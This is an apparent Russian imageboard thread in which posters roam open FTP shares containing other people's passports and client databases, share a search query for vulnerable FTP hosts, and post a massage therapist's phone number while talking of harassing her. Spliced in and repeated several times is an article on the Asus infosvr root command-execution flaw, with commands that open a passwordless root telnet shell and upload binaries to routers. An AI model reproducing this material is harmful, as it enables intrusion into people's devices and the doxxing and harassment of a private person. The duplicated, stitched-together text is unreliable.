я майор — вам пизда
Отец-одиночка?
Куча мультфильмов и папка с порно в .gif.
Майор, что ты забыл в Эстонии?
Куча мультфильмов и папка с порно в .gif.
Майор, что ты забыл в Эстонии?
я пизда - вам майор
>я Димон — вам пизда
Третий нах
$ что такое recycle bin?
хозяйка здоровенного кота
Стремно кидать айпи учитывая какие вы тут разрушители
Блээт, фотки Димона слэл.
я вам - майор пизда
Пiшов нахуй!
>голые тёти
А внутрь ты положил гомонигр?
Мы не должны забыть гену, он был первым, кто дал ништяков
Нет, я же не мудак, я ему порно в fHD накидал.
Корзина
Гена в ВК ответил кому-нибудь?
Да у неё и кровать здоровенная.
нашёл общую папку бизнес центра. оставил там заботливое сообщение анально покарать сисадмина. Самое паршивое, что там лежат паспорта людей, бухгалтерская отчётность, куча личных данных и базы клиентов. Я там уже не первый, там лежит паспорт Зелецкого, уже ставшего иконой треда и фото хуя осла. Пичалька.
Нет, но гомонигров я ему все равно накидал
Лучше бы аниме положил, предварительно выпилив все мультики для даунов. Пусть приобщается к нормальной анимации.
Три нахуй все под корэнь.
Почему у него буквально на лице написано, что он здесь сидит?
Почему полосы вдоль фото?
>и фото хуя осла
Блять, ну как так вообще? Неужели у них админ не окончил 9 классов? Я помниаю домашнение пеки страперов, но бизнес центр..
а вот собака мелкая
Напрашивается вывод что она шлюпка обыкновенная и трещина ее равна диаметру экватора
отэто да, никогда бы не подумал
да хрен его знает
здесь это где?
Тута.
Что за толстота нахуй?
Тута это здеся?
трипл врать не будт
Пидоры, верните польской вынарне нормальный сайт.
Блеа, как можно держать все файлы в открытом доступе?
>Неужели у них админ не окончил 9 классов?
Его вообще может и не быть.
Подъебнуть пшеков - святое дело.
А способ ужасный, будто на экран насрал.
Найди их номер. Смской бы хоть предупредить, но лучше бы позвонить.
тикаю с села, попал на серьёзных людей
А как камеры искать?
Ох я проигрываю представляю как где-то в польских ебенях звучит звонкое - о курва я пердоле
боюсь, что все их данные уже слиты
Сами вернут, хули. Сейчас только с горя винцахлебнут.
Иди отсюда.
Сейчас буду инспектировать.
Нет ты.
Чо такое Photo.scr ?
Запусти узнаешь
Это метка, типа фтп под защитой легиона.
Даже по синей лавочке зашквар на такую позариться
Твою мать.
Спокойно лимонил писю, а тут она меня нахуй послала и вышла. Ну нахуй.
Уже сутки 99% после оплаты. Как быть?
Привет из америки
Чет проиграл Интересно, что он хотел скачать сначала, пародию или оригинал?
Кто там хохлам ВЛАДИМИР ПУТИН МОЛОДЕЦ в папки раскидывает? Признавайтесь, содомиты.
проиграл
Молодец, теперь можешь сосать хуй.
Какие подводные, если кому тов комп залезть так?
это медисон?
Аниме! Ееее...
бля аноны какое-то красное окошко появилось, требует 300 долларов внести, чо делать?
условка))0)
Чем тебе Украиньская патриотична не угодила, пидр?
Это просто алиса-фетишист, оба ролика — порнуха, очень старая, с постановкой декорациями и сюжетом.
Патриот своей страны, а что?
В начале 2015 года компания Asus исправила критичнейшую уязвимость в своих роутерах. «Дыра» была в службе по имени infosvr, использующейся утилитами Asus для облегчения настройки роутера путём его автоматического обнаружения в локальной сети. Уязвимость позволяла выполнять любые команды с правами root (ведь infosvr тоже root), что давало злоумышленнику полный контроль над системой.
Но Asus выпустила исправленные прошивки. Теперь это всё в прошлом. Или нет? Хм… А как часто обыватели обновляют прошивки на своих роутерах?
Но Asus выпустила исправленные прошивки. Теперь это всё в прошлом. Или нет? Хм… А как часто обыватели обновляют прошивки на своих роутерах?
В чём дело?
Служба infosvr слушает 9999 порт (UDP). Когда приходит пакет размером не менее 512 байт она анализирует его и в зависимости от его типа выполняет соответствующие ответные действия. Например, собирает информацию о некоторых настройках роутера и отправляет её программе Device Discovery, которая помогает найти IP-адрес роутера. Но есть ещё и такой тип пакета, который подразумевает выполнение системной команды роутером. Тут-то Asus'овцы и облажались. Из-за ошибки в коде обработки такого пакета выполнить команду можно без всякой авторизации. Это строка if (memcpy(phdr_ex->MacAddress, mac, 6)==0) в следующем листинге (несущественные строки удалены):
Часть функции processPacket(int sockfd, char pdubuf) из common.c
if (phdr->OpCode!=NET_CMD_ID_GETINFO && phdr->OpCode!=NET_CMD_ID_GETINFO_MANU)
{
phdr_ex = (IBOX_COMM_PKT_HDR_EX )pdubuf;
// Check Mac Address
if (memcpy(phdr_ex->MacAddress, mac, 6)==0)
{
_dprintf("Mac Error %2x%2x%2x%2x%2x%2x\n",
(unsigned char)phdr_ex->MacAddress[0],
(unsigned char)phdr_ex->MacAddress[1],
(unsigned char)phdr_ex->MacAddress[2],
(unsigned char)phdr_ex->MacAddress[3],
(unsigned char)phdr_ex->MacAddress[4],
(unsigned char)phdr_ex->MacAddress[5]
);
return NULL;
}
phdr_res->Info = phdr_ex->Info;
memcpy(phdr_res->MacAddress, phdr_ex->MacAddress, 6);
}
Вероятно, там вместо memcpy предполагалось memcmp (вот что бывает когда копируете строки кода, с целью чуть-чуть подправить потом), а вместо == предполагалось !=. Но даже если бы этой ошибки не было, всё равно для проникновения достаточно было бы знать MAC-адрес.
После успешной «аутентификации» команда из пакета будет выполнена:
Та же функция; чуть далее по коду
А теперь, хотите квест?
Идите сюда
Выберите любой маршрутизатор
Пройдите по пути Поддержка -> Драйверы и утилиты -> ОС -> Firmware
Ищите в списке прошивку за январь 2015-го
В описании к ней наверняка есть скупая фраза "Fixed infosvr security issue."
???
!!!
Служба infosvr слушает 9999 порт (UDP). Когда приходит пакет размером не менее 512 байт она анализирует его и в зависимости от его типа выполняет соответствующие ответные действия. Например, собирает информацию о некоторых настройках роутера и отправляет её программе Device Discovery, которая помогает найти IP-адрес роутера. Но есть ещё и такой тип пакета, который подразумевает выполнение системной команды роутером. Тут-то Asus'овцы и облажались. Из-за ошибки в коде обработки такого пакета выполнить команду можно без всякой авторизации. Это строка if (memcpy(phdr_ex->MacAddress, mac, 6)==0) в следующем листинге (несущественные строки удалены):
Часть функции processPacket(int sockfd, char pdubuf) из common.c
if (phdr->OpCode!=NET_CMD_ID_GETINFO && phdr->OpCode!=NET_CMD_ID_GETINFO_MANU)
{
phdr_ex = (IBOX_COMM_PKT_HDR_EX )pdubuf;
// Check Mac Address
if (memcpy(phdr_ex->MacAddress, mac, 6)==0)
{
_dprintf("Mac Error %2x%2x%2x%2x%2x%2x\n",
(unsigned char)phdr_ex->MacAddress[0],
(unsigned char)phdr_ex->MacAddress[1],
(unsigned char)phdr_ex->MacAddress[2],
(unsigned char)phdr_ex->MacAddress[3],
(unsigned char)phdr_ex->MacAddress[4],
(unsigned char)phdr_ex->MacAddress[5]
);
return NULL;
}
phdr_res->Info = phdr_ex->Info;
memcpy(phdr_res->MacAddress, phdr_ex->MacAddress, 6);
}
Вероятно, там вместо memcpy предполагалось memcmp (вот что бывает когда копируете строки кода, с целью чуть-чуть подправить потом), а вместо == предполагалось !=. Но даже если бы этой ошибки не было, всё равно для проникновения достаточно было бы знать MAC-адрес.
После успешной «аутентификации» команда из пакета будет выполнена:
Та же функция; чуть далее по коду
А теперь, хотите квест?
Идите сюда
Выберите любой маршрутизатор
Пройдите по пути Поддержка -> Драйверы и утилиты -> ОС -> Firmware
Ищите в списке прошивку за январь 2015-го
В описании к ней наверняка есть скупая фраза "Fixed infosvr security issue."
???
!!!
Впечатляют масштабы? На самом деле всё было не так уж и плохо (а сейчас, когда «дыру» закрыли — вообще хорошо). Дело в том, что infosvr работает с интерфейсом br0, т.е. с мостом между другими интерфейсами. В случае, если роутер работает в режиме IP Sharing (Режим общего IP), br0 объединяет eth0 и wlan0. Заметьте, eth1 (который WAN) сюда не входит. Т.е. уже радует то, что с внешней сети никто не пролезет. А вот когда роутер в режиме Access point, то br0 объединяет все интерфейсы…
История обнаружения
Как-то мне захотелось порулить своим роутером через UART, то бишь через аппаратную консоль. «Зачем такие трудности? По телнету зайди.» — скажете вы. Не тут-то было! Это же RT-N10E! (Он же RT-N10LX).
История обнаружения
Как-то мне захотелось порулить своим роутером через UART, то бишь через аппаратную консоль. «Зачем такие трудности? По телнету зайди.» — скажете вы. Не тут-то было! Это же RT-N10E! (Он же RT-N10LX).
Из всего пакета Asus Utility (Device Discovery, Router Setup Wizard и Firmware Restoration) реакцию консоли вызвал только Router Setup Wizard. А именно: при запуске приложения и нажатии на кнопку «Далее» появляются такие строки:
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
Хм…
Эти команды Router Setup Wizard передаёт? Посмотрел через Wireshark — да, эти команды передаются в UDP пакетах с RSW. А что если их заменить на свои?
Оказывается, я не первый
Перед тем, как начать ковыряться в пакетах, я решил погуглить. И нагуглил кое-что (раз и два). По второй ссылке подробное описание уязвимости и простой эксплоит под Линукс (есть и на python-е).
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1 > /tmp/syscmd.out
2 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting > /tmp/syscmd.out
0 1
Хм…
Эти команды Router Setup Wizard передаёт? Посмотрел через Wireshark — да, эти команды передаются в UDP пакетах с RSW. А что если их заменить на свои?
Оказывается, я не первый
Перед тем, как начать ковыряться в пакетах, я решил погуглить. И нагуглил кое-что (раз и два). По второй ссылке подробное описание уязвимости и простой эксплоит под Линукс (есть и на python-е).
Велосипед AsusCmd
Мне хотелось бы иметь такую программку под Windows, поскольку Я 95% времени пользуюсь именно ей. Не хочется ради выполнения какой-то команды загружать виртуальную машину с Ubuntu.
Размеры
В процессе написания и отладки эксплоита, а также копания в исходниках infosvr выяснились «параметры» этой «дыры».
А именно её размеры. Они такие:
Размеры буферов приёма и отправки — по 420 байт. И всё бы неплохо, но реально 420 байт роутер может только отправить в ответе. А вот с приёмом дела ещё хуже. Дело в том, что после приёма команды infosvr обрезает её до 256 символов и только потом — исполняет. Но и это ещё не последнее ограничение. При выполнении команды длиной чуть менее 256 символов infosvr падает с грохотом segmentation fault. Команда выполнена, но ни ответа уже не будет, ни возможности исполнить ещё что-то. Опытным путём была найдена предельная безопасная длина пользовательской команды. Это 238 символов. Итак, размеры «дыры»: 238 — команда, 420 — ответ.
Подробнее (с примером)
infosvr вызывает
system(«echo „Some text“>/var/myText;cat /var/myText > /tmp/syscmd.out»);
Тут полная команда:
'echo «Some text»>/var/myText;cat /var/myText > /tmp/syscmd.out'
Где:
'echo «Some text»>/var/myText;cat /var/myText'
— команда, отправленная пользователем с помощью AsusCmd;
' > /tmp/syscmd.out'
— жёстко запрограммировано в коде infosvr.
Кстати, зачем нужно перенаправление в /tmp/syscmd.out? А затем, что именно с него потом считывается в буфер 420 байт и отправляется ответ на команду.
«Предельная безопасная длина» относится именно к пользовательской команде.
Т.е. при длине пользовательской команды 238 символов длина полной команды будет 238+18=256. Может именно падения infosvr хотели избежать разработчики, когда обрезали команду до 256 символов? Похоже они не учли strlen(" > /tmp/syscmd.out").
Мне хотелось бы иметь такую программку под Windows, поскольку Я 95% времени пользуюсь именно ей. Не хочется ради выполнения какой-то команды загружать виртуальную машину с Ubuntu.
Размеры
В процессе написания и отладки эксплоита, а также копания в исходниках infosvr выяснились «параметры» этой «дыры».
А именно её размеры. Они такие:
Размеры буферов приёма и отправки — по 420 байт. И всё бы неплохо, но реально 420 байт роутер может только отправить в ответе. А вот с приёмом дела ещё хуже. Дело в том, что после приёма команды infosvr обрезает её до 256 символов и только потом — исполняет. Но и это ещё не последнее ограничение. При выполнении команды длиной чуть менее 256 символов infosvr падает с грохотом segmentation fault. Команда выполнена, но ни ответа уже не будет, ни возможности исполнить ещё что-то. Опытным путём была найдена предельная безопасная длина пользовательской команды. Это 238 символов. Итак, размеры «дыры»: 238 — команда, 420 — ответ.
Подробнее (с примером)
infosvr вызывает
system(«echo „Some text“>/var/myText;cat /var/myText > /tmp/syscmd.out»);
Тут полная команда:
'echo «Some text»>/var/myText;cat /var/myText > /tmp/syscmd.out'
Где:
'echo «Some text»>/var/myText;cat /var/myText'
— команда, отправленная пользователем с помощью AsusCmd;
' > /tmp/syscmd.out'
— жёстко запрограммировано в коде infosvr.
Кстати, зачем нужно перенаправление в /tmp/syscmd.out? А затем, что именно с него потом считывается в буфер 420 байт и отправляется ответ на команду.
«Предельная безопасная длина» относится именно к пользовательской команде.
Т.е. при длине пользовательской команды 238 символов длина полной команды будет 238+18=256. Может именно падения infosvr хотели избежать разработчики, когда обрезали команду до 256 символов? Похоже они не учли strlen(" > /tmp/syscmd.out").
Но так рулить роутером не очень удобно. И, если в данном случае ограничение в 238 символов команды не сильно заметно, то ограничение на вывод ответа в 420 символов — это уже печальнее. Но выход есть! Хоть на роутере и сильно ограниченный busybox, но там всё-же есть telnetd! Запускать его лучше на нестандартном порте, т.к. защиты нет никакой: для подключения пароль не нужен.
AsusCmd.exe «telnetd -l/bin/sh -p777»
Ну, теперь другое дело! Можно полноценно командовать со всеми удобствами, как-то история команд и дополнение по Tab. Если телнет перестал отвечать, его можно перезапустить, не перезагружая роутер. Сначала надо прибить связанный с ним sh:
AsusCmd.exe «killall -9 sh»
Учтите, что после выполнения этой команды будет также убит sh, который связан с /dev/console. Теперь можно снова запускать telnetd.
Отлично. Тема исчерпана? Как-бы не так.
Продолжение банкета
Итак, мы можем пользоваться всеми доступными командами. Можем создавать и удалять файлы в каталогах, доступных для записи (ramfs /var). Можно записать несколькими командами длинный текстовый файл. Но не только текстовый! Ведь echo в Linux-е умеет преобразовывать текст в двоичные данные! Это значит, что мы можем заливать на роутер свои программы, которых нам не хватает!
AsusBinWrite
Идея проста:
считываем порцию байт с файла-источника
преобразуем их в текстовый вид, понятный для 'echo -e'
формируем системную команду
отправляем на роутер
повторяем пока не перешлём весь файл
Но это на словах всё легко и просто. На практике мы имеем дело с парой неприятных факторов:
UDP пакеты, которые иногда теряются
Ограничение на полезную длину системной команды (238 символов)
AsusCmd.exe «telnetd -l/bin/sh -p777»
Ну, теперь другое дело! Можно полноценно командовать со всеми удобствами, как-то история команд и дополнение по Tab. Если телнет перестал отвечать, его можно перезапустить, не перезагружая роутер. Сначала надо прибить связанный с ним sh:
AsusCmd.exe «killall -9 sh»
Учтите, что после выполнения этой команды будет также убит sh, который связан с /dev/console. Теперь можно снова запускать telnetd.
Отлично. Тема исчерпана? Как-бы не так.
Продолжение банкета
Итак, мы можем пользоваться всеми доступными командами. Можем создавать и удалять файлы в каталогах, доступных для записи (ramfs /var). Можно записать несколькими командами длинный текстовый файл. Но не только текстовый! Ведь echo в Linux-е умеет преобразовывать текст в двоичные данные! Это значит, что мы можем заливать на роутер свои программы, которых нам не хватает!
AsusBinWrite
Идея проста:
считываем порцию байт с файла-источника
преобразуем их в текстовый вид, понятный для 'echo -e'
формируем системную команду
отправляем на роутер
повторяем пока не перешлём весь файл
Но это на словах всё легко и просто. На практике мы имеем дело с парой неприятных факторов:
UDP пакеты, которые иногда теряются
Ограничение на полезную длину системной команды (238 символов)
ЦЕНТРУМ ДЕПОЗИТАРИЙ
ООО «Центрум депозитарий»
115088, г. Москва, ул. Угрешская, д.2, стр.22
телефон/факс (499) 258-30-38
www.centrum-depo.ru, [email protected]
это из шапки их документов. можете написать им. ебал я светиться и потом доказывать, что я не верблюд
Но так рулить роутером не очень удобно. И, если в данном случае ограничение в 238 символов команды не сильно заметно, то ограничение на вывод ответа в 420 символов — это уже печальнее. Но выход есть! Хоть на роутере и сильно ограниченный busybox, но там всё-же есть telnetd! Запускать его лучше на нестандартном порте, т.к. защиты нет никакой: для подключения пароль не нужен.
AsusCmd.exe «telnetd -l/bin/sh -p777»
Ну, теперь другое дело! Можно полноценно командовать со всеми удобствами, как-то история команд и дополнение по Tab. Если телнет перестал отвечать, его можно перезапустить, не перезагружая роутер. Сначала надо прибить связанный с ним sh:
AsusCmd.exe «killall -9 sh»
Учтите, что после выполнения этой команды будет также убит sh, который связан с /dev/console. Теперь можно снова запускать telnetd.
Отлично. Тема исчерпана? Как-бы не так.
Продолжение банкета
Итак, мы можем пользоваться всеми доступными командами. Можем создавать и удалять файлы в каталогах, доступных для записи (ramfs /var). Можно записать несколькими командами длинный текстовый файл. Но не только текстовый! Ведь echo в Linux-е умеет преобразовывать текст в двоичные данные! Это значит, что мы можем заливать на роутер свои программы, которых нам не хватает!
AsusBinWrite
Идея проста:
считываем порцию байт с файла-источника
преобразуем их в текстовый вид, понятный для 'echo -e'
формируем системную команду
отправляем на роутер
повторяем пока не перешлём весь файл
Но это на словах всё легко и просто. На практике мы имеем дело с парой неприятных факторов:
UDP пакеты, которые иногда теряются
Ограничение на полезную длину системной команды (238 символов)
AsusCmd.exe «telnetd -l/bin/sh -p777»
Ну, теперь другое дело! Можно полноценно командовать со всеми удобствами, как-то история команд и дополнение по Tab. Если телнет перестал отвечать, его можно перезапустить, не перезагружая роутер. Сначала надо прибить связанный с ним sh:
AsusCmd.exe «killall -9 sh»
Учтите, что после выполнения этой команды будет также убит sh, который связан с /dev/console. Теперь можно снова запускать telnetd.
Отлично. Тема исчерпана? Как-бы не так.
Продолжение банкета
Итак, мы можем пользоваться всеми доступными командами. Можем создавать и удалять файлы в каталогах, доступных для записи (ramfs /var). Можно записать несколькими командами длинный текстовый файл. Но не только текстовый! Ведь echo в Linux-е умеет преобразовывать текст в двоичные данные! Это значит, что мы можем заливать на роутер свои программы, которых нам не хватает!
AsusBinWrite
Идея проста:
считываем порцию байт с файла-источника
преобразуем их в текстовый вид, понятный для 'echo -e'
формируем системную команду
отправляем на роутер
повторяем пока не перешлём весь файл
Но это на словах всё легко и просто. На практике мы имеем дело с парой неприятных факторов:
UDP пакеты, которые иногда теряются
Ограничение на полезную длину системной команды (238 символов)
Там банально нет пароля
Пшеки повержены Великой Украиной.
Собираем тулчейн для нашего роутера
Вот мой скрипт-памятка (выбирайте конфигуратор по вкусу):
#!/bin/sh
wget http://buildroot.uclibc.org/downloads/buildroot-2014.11.tar.gz
tar zxf buildroot-2014.11.tar.gz
cd buildroot-2014.11
sudo apt-get -y install g++
# curses-based configurators
sudo apt-get -y install libncurses5-dev
make menuconfig # original curses-based configurator
#make nconfig # new curses-based configurator
# Qt-based configurator
#sudo apt-get -y install libqt4-dev
#make xconfig # Qt-based configurator
# GTK-based configurator
#sudo apt-get -y install libgtk2.0-dev libglade2-dev
#make gconfig # GTK-based configurator
make
На шаге make *config настраиваем тулчейн.
По крайней мере, надо настроить целевую архитектуру. Target options ---> Target Architecture и Target Architecture Variant. Тут есть небольшой подвох: вот так сразу в Target Architecture Variant Mips I вы не найдёте. Чтобы он там появился нужно включить опцию Build options ---> Show options and packages that are deprecated or obsolete.
Можно больше ничего не настраивать. А можно ещё много чего настроить: включить поддержку C++ и других языков, статическую компоновку (у меня ничего хорошего с этого не вышло), выбрать компилируемые под целевую архитектуру приложения, апплеты busybox, версии библиотек и т.п.
Вот мой скрипт-памятка (выбирайте конфигуратор по вкусу):
#!/bin/sh
wget http://buildroot.uclibc.org/downloads/buildroot-2014.11.tar.gz
tar zxf buildroot-2014.11.tar.gz
cd buildroot-2014.11
sudo apt-get -y install g++
# curses-based configurators
sudo apt-get -y install libncurses5-dev
make menuconfig # original curses-based configurator
#make nconfig # new curses-based configurator
# Qt-based configurator
#sudo apt-get -y install libqt4-dev
#make xconfig # Qt-based configurator
# GTK-based configurator
#sudo apt-get -y install libgtk2.0-dev libglade2-dev
#make gconfig # GTK-based configurator
make
На шаге make *config настраиваем тулчейн.
По крайней мере, надо настроить целевую архитектуру. Target options ---> Target Architecture и Target Architecture Variant. Тут есть небольшой подвох: вот так сразу в Target Architecture Variant Mips I вы не найдёте. Чтобы он там появился нужно включить опцию Build options ---> Show options and packages that are deprecated or obsolete.
Можно больше ничего не настраивать. А можно ещё много чего настроить: включить поддержку C++ и других языков, статическую компоновку (у меня ничего хорошего с этого не вышло), выбрать компилируемые под целевую архитектуру приложения, апплеты busybox, версии библиотек и т.п.
После настройки выбираем Exit, соглашаемся с сохранением новой конфигурации и… make. Сборка займёт продолжительное время, в зависимости от того, что вы там в настройках понавыбирали (У меня при настройке только архитектуры целевого процессора сборка на VM Ware заняла немногим более полу часа. Замерял так: ttt=`date`; make; echo $ttt; date). Можно параллельно собирать, но не с помощью -jN. Руководство гласит:
You should never use make -jN with Buildroot: top-level parallel make is currently not supported. Instead, use the BR2_JLEVEL option to tell Buildroot to run the compilation of each individual package with make -jN.
Т.е. нужно настраивать параметр Build options ---> Number of jobs to run simultaneously.
Toolchain готов
Наконец, по прошествии xx минут тулчейн собрался полностью и без ошибок. Можно использовать. GCC для роутера будет по пути ./buildroot-2014.11/output/host/usr/bin/mips-linux-gcc (симлинк на mips-buildroot-linux-uclibc-gcc).
Для начала напишем примитивную программку, скомпилируем, зальём на роутер, выставим разрешение на исполнение (трюк, показанный ранее) и запустим:
Теперь можно писать свои программы для роутера, учитывая ограниченность ресурсов и возможности библиотек, которые есть на роутере.
Но вместе с тулчейном собрались и некоторые бинарники на целевую платформу! Лежат они здесь: ./buildroot-2014.11/output/target/ bin | sbin | usr/bin | usr/sbin. Я перепробовал многие из них (в menuconfig настроил сборку множества дополнительных приложений). Те, которые оказались рабочими и показались полезными сохранил отдельно (может когда-то понадобятся).
Рабочими оказались не все. После загрузки на роутер многие отказывались работать по различным причинам:
чаще всего — can't load library 'какая-то библиотека'
частично работают — can't resolve symbol 'какой-то символ'
Segmentation fault — без комментариев
а все статически слинкованные — Illegal instruction
You should never use make -jN with Buildroot: top-level parallel make is currently not supported. Instead, use the BR2_JLEVEL option to tell Buildroot to run the compilation of each individual package with make -jN.
Т.е. нужно настраивать параметр Build options ---> Number of jobs to run simultaneously.
Toolchain готов
Наконец, по прошествии xx минут тулчейн собрался полностью и без ошибок. Можно использовать. GCC для роутера будет по пути ./buildroot-2014.11/output/host/usr/bin/mips-linux-gcc (симлинк на mips-buildroot-linux-uclibc-gcc).
Для начала напишем примитивную программку, скомпилируем, зальём на роутер, выставим разрешение на исполнение (трюк, показанный ранее) и запустим:
Теперь можно писать свои программы для роутера, учитывая ограниченность ресурсов и возможности библиотек, которые есть на роутере.
Но вместе с тулчейном собрались и некоторые бинарники на целевую платформу! Лежат они здесь: ./buildroot-2014.11/output/target/ bin | sbin | usr/bin | usr/sbin. Я перепробовал многие из них (в menuconfig настроил сборку множества дополнительных приложений). Те, которые оказались рабочими и показались полезными сохранил отдельно (может когда-то понадобятся).
Рабочими оказались не все. После загрузки на роутер многие отказывались работать по различным причинам:
чаще всего — can't load library 'какая-то библиотека'
частично работают — can't resolve symbol 'какой-то символ'
Segmentation fault — без комментариев
а все статически слинкованные — Illegal instruction
А если у вас будет ошибка типа Bus error или unexpected word, то скорее всего вы ошиблись с выбором целевой архитектуры (или банально файл повреждён).
Повышаем комфорт
Вы, наверное, заметили, что скорость передачи файла через «дыру» в infosvr, мягко говоря, оставляет желать лучшего. Я хотел решить эту проблему написанием TargetSideAgent, который бы весил немного и поднимал полноценное TCP соединение. Уже и немного кода написал, как ВНЕЗАПНО открыл для себя чудо-утилиту netcat! Эта утилита оказалась рабочей среди приложений, собранных buildroot для целевой платформы. Теперь не надо долго мучиться — netcat передаёт файлы на роутер (да и с роутера тоже) почти мгновенно! Для быстрой передачи теперь можно использовать такой подход:
с помощью AsusBinWrite заливаем на роутер netcat
устанавливаем ему разрешение на исполнение
запускаем на приём:
./netcat -vvlp 8888 > recvfile
а с компа запускаем на передачу:
ncat.exe -vv --send-only 192.168.1.1 8888 < Useful\cpuload
Кстати, если у вас почему-то прервалась передача файла с помощью AsusBinWrite, то её можно возобновить, использовав опцию RESUME:
Возобновление прерванной передачи
Теперь скорость приличная и можно легко загружать даже «увесистые» файлы. Но не увлекайтесь. Не забывайте, что /var и /tmp (который на самом деле /var/tmp) — это оперативная память роутера. Если вы полностью её забьёте — роутер перестанет отвечать (или вообще зависнет). В этом случае придётся его перезагрузить вручную. Контролируйте свободную память при помощи free.
Кстати, когда я искал netcat под Windows, то наткнулся на "netcat 21-го века". Он гораздо богаче функционалом, чем обычный netcat. Для нашего случая очень полезной оказалась опция --send-only (разорвать соединение сразу после передачи).
Повышаем комфорт
Вы, наверное, заметили, что скорость передачи файла через «дыру» в infosvr, мягко говоря, оставляет желать лучшего. Я хотел решить эту проблему написанием TargetSideAgent, который бы весил немного и поднимал полноценное TCP соединение. Уже и немного кода написал, как ВНЕЗАПНО открыл для себя чудо-утилиту netcat! Эта утилита оказалась рабочей среди приложений, собранных buildroot для целевой платформы. Теперь не надо долго мучиться — netcat передаёт файлы на роутер (да и с роутера тоже) почти мгновенно! Для быстрой передачи теперь можно использовать такой подход:
с помощью AsusBinWrite заливаем на роутер netcat
устанавливаем ему разрешение на исполнение
запускаем на приём:
./netcat -vvlp 8888 > recvfile
а с компа запускаем на передачу:
ncat.exe -vv --send-only 192.168.1.1 8888 < Useful\cpuload
Кстати, если у вас почему-то прервалась передача файла с помощью AsusBinWrite, то её можно возобновить, использовав опцию RESUME:
Возобновление прерванной передачи
Теперь скорость приличная и можно легко загружать даже «увесистые» файлы. Но не увлекайтесь. Не забывайте, что /var и /tmp (который на самом деле /var/tmp) — это оперативная память роутера. Если вы полностью её забьёте — роутер перестанет отвечать (или вообще зависнет). В этом случае придётся его перезагрузить вручную. Контролируйте свободную память при помощи free.
Кстати, когда я искал netcat под Windows, то наткнулся на "netcat 21-го века". Он гораздо богаче функционалом, чем обычный netcat. Для нашего случая очень полезной оказалась опция --send-only (разорвать соединение сразу после передачи).
>"Fixed infosvr security issue."
И? Мамкин гений не знает что такое баги?
Патриот пыни.
вратарь такой, в спартаке играл.
Тут остро нехватает хуя осла
вин
Бамп
Ты пидор блять. Лучше я бы не кидал.
Ну хоть не забыла.
годнота есть? ток не толсти
Я тут нашёл кое-что, что косвенно должно охладить майоров, жопоголиков и пр. 2015 год, всем до сих пор похуй, расслабьтесь.
Этот пирсинг..
Бля. как можно быть такими необучаемыми?
Эти брови... сбрей/нарисуй
Бампецкий
Там всё в таком духе
Там всё в таком духе
Love Russia было бы лучше, пшеконацики охуели бы.
Это ШИН
люди с асусами - закрывайте порт 21
Потрёпанная
Четкая фамилия у Сёмки.
И пара фоток страшной милфы внизу
триплодабл не соврет
как раз для продажи алкашки
это убермаргенштамп
Спасибо, подрочил
Та нахуя када можно все на хохлов свалить?
>убермаргенштамп
эээ бля сложна
>пшеконацики
+15
Чет совсем плохо с ней
Как ещё можно нарулить подобные ftp серверы?
Those sweden galz.
Вот совсем разочаруешься в тянках из-за таких вот и пойдёшь сношаться с кунами. Эх...
>страшной
Она не страшная а вполне обычная, даже ничего ещё. Краски на лице нету.
Нету — игрок Зенита
>4 пик
Ебать она озабоченная.
BATYA SUKA
блять че опять дрочить?
Ета хитман?)))
го деанон по сертефикатам
port:21 tp-link 230
Пожалуйста
Пожалуйста
ждём истории травли стоматолога
ненавижу блять стоматологов
стоматолога?
ТССССС, Антоша
Это старые пикчи.
Хорошо, что я юзаю KeePass. Но всё равно ссусь того, что какое-нибудь шпионское ПО похитит базу вместе с мастер-паролем, захватив его с клавиатуры.
>port:21 tp-link 230
тоже катит
блет, ошибся, чёт из-за лампы подумал что стоматологический кабинет
Да. И это будет полный пиздец - все твои пассы в одних руках разом
Потрясающе, потрясающе!
мистер кот наверно думает куда я попал блять
Продолжай.
Бля, Антош, как же у меня дымит шишак с ее чулок.
травле то быть не? легион собирать?
фу мерзкий пуп
чё по фамилии?
попался.jpeg
тоже обратил внимание.
Ебать, да они еще для записи доступны
петылицина?
Эпический деанон
Нихуя не разобрать.
Юлия Павловна хороша
http://массажист.рф/pforms/list/13374/
Налетай на массажистку
Налетай на массажистку
может кабинет не ее. оттого владелиуе диплома будет еще интереснее глянуть на фотки
город какой?
Потыпицина, не?
В этом и прикол
Эпичнее треда и быть не могло
>Опыт работы массажистом (лет): 12
>Возраст: 37
Она с 25 лет массаж простаты делает, мне жаль небегать
Телефон: +79029277875
Мобилка ее. Наслаждайтесь.
Эх, помню так через радмин лазили сто лет назад
Жалко её. 12 лет мять бока всяким бабкам - это не шутки.
14 мая - СЕМИНАР ДЛЯ ЖЕНЩИН. "ВОЗВРАЩЕНИЕ К ЖЕНСКОЙ ПРИРОДЕ. ОЧИЩЕНИЕ МАТКИ". (с 17-19:00)
По Вашим заявкам впервые в Красноярске!
По Вашим заявкам впервые в Красноярске!
Ну ничего, мы ей поможем.
Вау
Топовая тян с топовой профессией, как по мне. Женился бы.
"ВОЗВРАЩЕНИЕ К ЖЕНСКОЙ ПРИРОДЕ. ОЧИЩЕНИЕ МАТКИ ПЕРФОРАТОРОМ"
